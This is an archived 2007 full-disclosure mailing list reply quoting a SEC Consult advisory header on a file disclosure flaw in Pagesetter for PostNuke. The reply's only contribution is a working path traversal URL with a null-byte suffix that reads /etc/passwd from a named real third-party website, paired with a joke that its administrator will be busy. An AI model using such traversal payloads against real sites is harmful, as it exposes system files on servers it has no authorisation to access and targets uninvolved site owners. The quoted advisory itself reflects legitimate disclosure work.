[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [Full-disclosure] SEC Consult SA-20070226-0 :: File Disclosure
From: Matthew Flaschen <matthew.flaschen () gatech ! edu>
Date: 2007-02-27 9:02:05
Message-ID: 45E3F38D.9030707 () gatech ! edu
[Download RAW message or body]
[Attachment #2 (multipart/signed)]
research@sec-consult.com wrote:
> SEC Consult Security Advisory 20070226-0
> =======================================================================
> title: File Disclosure in Pagesetter for PostNuke
> program: Pagesetter page creation module
> vulnerable version: 6.2.0
> 6.3.0 beta 5
> impact: high
> homepage: http://www.elfisk.dk
> found: 2006-11-21
> by: D. Matscheko / SEC-CONSULT /
> www.sec-consult.com
> =======================================================================
>
> vendor description:
> ---------------
>
> Pagesetter is a publishing module that allows the PostNuke users to
> create web pages from structured data, with the data structure and
> output templates defined by the PostNuke administrator.
>
> [Source: http://www.elfisk.dk]
>
I think brendanb's going to be busy.
http://www.nesco.com.au/index.php?module=Pagesetter&type=file&func=preview&id=../../../../../../../../../etc/passwd%00
["signature.asc" (application/pgp-signature)]
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic